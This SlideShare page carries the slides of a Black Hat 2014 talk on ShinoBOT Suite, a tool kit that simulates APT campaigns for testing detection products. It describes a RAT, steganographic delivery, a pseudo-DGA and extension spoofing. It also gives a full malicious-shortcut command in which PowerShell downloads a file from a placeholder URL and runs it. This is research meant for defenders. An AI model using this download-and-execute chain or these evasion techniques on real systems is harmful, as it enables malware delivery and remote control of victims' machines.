Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
ShinoBOT
SUITE
The APT Simulator Tool Kit
@Sh1n0g1 1
About ME
 Shota Shinogi @Sh1n0g1
 http://shinosec.com
 Security Researcher at Macnica Networks Corp.
Japanese Disty of...
ShinoBOT the RAT
ShinoBOT.exe
ShinoBOT is a RAT (simulator)
 Presented at Black Hat USA 2013 Arsenal
 It connects to Shi...
What is ShinoBOT Suite
ShinoBOT Suite is a tool kit to create an APT attack
with just a few clicks, to simulate a highly-
...
Why ShinoBOT Suite ?
 There is a bunch of new security tools to
detect/response the unknown threat
Sandbox based Malware...
ShinoBOT Suite Campaign
Malicious
Shortcut
Downloader
Dropper
RAT
Decoy File
C&C
Server
Malware
Deploy
Server
dldr_tmp
Shi...
ShinoBOT Suite Campaign
Malicious
Shortcut
Downloader
Dropper
RAT
Decoy File
C&C
Server
Malware
Deploy
Server
dldr_tmp
Shi...
DEMONSTRATION STEP1
8
9
DEMONSTRATION STEP2
10
DEMONSTRATION STEP3
11
DEMONSTRATION STEP4
12
DEMONSTRATION STEP3
13
DEMONSTRATION RUN
Decoy File
ShinoBOT works in
background
14
DEMONSTRATION CONTROL1
To control ShinoBOT (RAT), you need to grab
the password, it is to prevent the abuse of
ShinoBO...
15
DEMONSTRATION CONTROL2
To control ShinoBOT (RAT), you need to grab
the password, it is to prevent the abuse of
ShinoBO...
16
DEMONSTATION CONTROL3
Access to ShinoBOT.com
Go to the host list
Your host will appear in the host list
Click the [...
17
DEMONSTATION CONTROL4
Put the password to see the Loot (result) of the
command
Put the password to assign a new job
Technical Detail 1
Malicious Shortcut
"target" of the shortcut (all in 1 line)
cmd.exe /c
powershell
(new objectSystem.N...
Technical Detail 2
Extension Spoofing
On the target of shortcut, there is the line
"%TEMP%LicenseRnd.txt" (previous slid...
Technical Detail 3
Crypto Stuff
ShinoBOT Suite uses XOR and ROR (4 bit rotate)
Key is used just for the XOR, and ROR is...
Technical Detail 4
Steganography
The encrypted RAT is hidden in the kitten image.
JPG data
Encrypted RAT
[Binary Visuali...
22
Technical Detail 5
Domain Generation Algorithm
ShinoBOT (the RAT) uses pseudo-DGA.
It generates a random host name f...
All Components are customizable,
modulable
Exploit
ShellCode
Downloader
Dropper
RAT
Decoy File
C&C
Server
Malware
Deploy
S...
Thank you
Visit my site and get the
recipe of ShinoBOT SUITE.
http://shinosec.com 24
Upcoming SlideShare
Loading in …5
×

ShinoBOT Suite

23,578 views

Published on

ShinoBOT Suite is a cyber attack campaign simulator. This slide was presented at the Black Hat USA 2014 Arsenal.

Published in: Technology
  • Be the first to comment

ShinoBOT Suite

  1. 1. ShinoBOT SUITE The APT Simulator Tool Kit @Sh1n0g1 1
  2. 2. About ME  Shota Shinogi @Sh1n0g1  http://shinosec.com  Security Researcher at Macnica Networks Corp. Japanese Disty of security/network products  Enthusiast of writing (ethical) malware  Presented ShinoBOT (not Suite) last year at Arsenal 2
  3. 3. ShinoBOT the RAT ShinoBOT.exe ShinoBOT is a RAT (simulator)  Presented at Black Hat USA 2013 Arsenal  It connects to ShinoC2, the C&C Server using HTTP(S).  What you can do with ShinoBOT via ShinoC2 Execute a command Upload / Download a file Take a screen shot  It is a SIMULATOR it has a GUI you need the password which is showed on the GUI to control it 3
  4. 4. What is ShinoBOT Suite ShinoBOT Suite is a tool kit to create an APT attack with just a few clicks, to simulate a highly- sophisticated attack campaign.  What is contained Exploit (Shortcut contains a malicious script) Malware Delivery Server (ShinoMAL.mooo.com) Downloader/Dropper (ShinoDownloader.exe) RAT (ShinoBOT.exe) C&C Server (ShinoC2] Steganography, crypto, DGA and some evasion techniques 4
  5. 5. Why ShinoBOT Suite ?  There is a bunch of new security tools to detect/response the unknown threat Sandbox based Malware Detection System ETDR (Endpoint Threat Detect & Response) SIEM (Security Information & Event Manager) Security Analytics / Network Forensics  It is hard to evaluate those new products Known malware will be detected by signature ♦ ≠ Unknown Threat To simulate a realistic APT ♦ requires a high skill ♦ takes too much time ♦ spends a lot of money using some commercial tools 5
  6. 6. ShinoBOT Suite Campaign Malicious Shortcut Downloader Dropper RAT Decoy File C&C Server Malware Deploy Server dldr_tmp ShinoBOT.exe 5)Download 4)Open 8)C2 Communication 1)Download 2)Execute img.jpg 3)Drop 6)Decrypt 7)Execute 6
  7. 7. ShinoBOT Suite Campaign Malicious Shortcut Downloader Dropper RAT Decoy File C&C Server Malware Deploy Server dldr_tmp ShinoBOT.exe 5)Download 4)Open 8)C2 Communication 1)Download 2)Execute img.jpg 3)Drop 6)Decrypt 7)Execute 7 ShinoMAL ShinoC2 ShinoBOT Shino Downloader
  8. 8. DEMONSTRATION STEP1 8
  9. 9. 9 DEMONSTRATION STEP2
  10. 10. 10 DEMONSTRATION STEP3
  11. 11. 11 DEMONSTRATION STEP4
  12. 12. 12 DEMONSTRATION STEP3
  13. 13. 13 DEMONSTRATION RUN Decoy File ShinoBOT works in background
  14. 14. 14 DEMONSTRATION CONTROL1 To control ShinoBOT (RAT), you need to grab the password, it is to prevent the abuse of ShinoBOT. ShinoBOT saved its password to the same folder (C:Users%USERNAME%sb.pas) You can access to the password word file remotely. %MACHINENAME%C$Users%USERNAME%sb.pas
  15. 15. 15 DEMONSTRATION CONTROL2 To control ShinoBOT (RAT), you need to grab the password, it is to prevent the abuse of ShinoBOT. ShinoBOT saved its password in this text file. (C:Users%USERNAME%sb.pas) You can access to the password word file remotely. %MACHINENAME%C$Users%USERNAME%sb.pas  This password protection is to prevent the real guys to abuse ShinoBOT.
  16. 16. 16 DEMONSTATION CONTROL3 Access to ShinoBOT.com Go to the host list Your host will appear in the host list Click the [View/Assign Jobs] link
  17. 17. 17 DEMONSTATION CONTROL4 Put the password to see the Loot (result) of the command Put the password to assign a new job
  18. 18. Technical Detail 1 Malicious Shortcut "target" of the shortcut (all in 1 line) cmd.exe /c powershell (new objectSystem.Net.WebClient) .DownloadFile('DOWNLOADERURL', '%TEMP%LicenseRnd.txt'); & %TEMP%LicenseRnd.txt & ::DECOYFILENAME POWERSHELL downloads the downloader, and save it CMD executes the downloader(Rnd means random string) CMD ignores this line because :: means a comment 18
  19. 19. Technical Detail 2 Extension Spoofing On the target of shortcut, there is the line "%TEMP%LicenseRnd.txt" (previous slide) Usually, when you double click the file with .txt, the notepad will launch CMD.exe can execute the executables(contains the MZ header) with any extension ShinoBOT Suite uses this techniques to spoof the extension, and make the donwloader hard to be found from the disk Actually, it is the ShinoDownloader.exe 19
  20. 20. Technical Detail 3 Crypto Stuff ShinoBOT Suite uses XOR and ROR (4 bit rotate) Key is used just for the XOR, and ROR is always 4 bits ShinoBOT Suite generates a random key (200 ~ 255 byte) so it is little bit difficult to decrypt the whole file without having the key 20
  21. 21. Technical Detail 4 Steganography The encrypted RAT is hidden in the kitten image. JPG data Encrypted RAT [Binary Visualizer] 21
  22. 22. 22 Technical Detail 5 Domain Generation Algorithm ShinoBOT (the RAT) uses pseudo-DGA. It generates a random host name for the C2 Server. rrrr.r.shinobot.com " r " is replaced by a random character. The DNS of shinobot.com responds any host with the C2 server IP address.
  23. 23. All Components are customizable, modulable Exploit ShellCode Downloader Dropper RAT Decoy File C&C Server Malware Deploy Server KB1234567.exe Invitation.pdf Invitation.pdf (legitimate) ShinoBOT.exe 5)Download 4)Open 8)C2 Communication 1)Download 2)Execute img.jpg 3)Drop KB1234567.exe 6)Decrypt 7)Execute Phishing Email 23
  24. 24. Thank you Visit my site and get the recipe of ShinoBOT SUITE. http://shinosec.com 24

×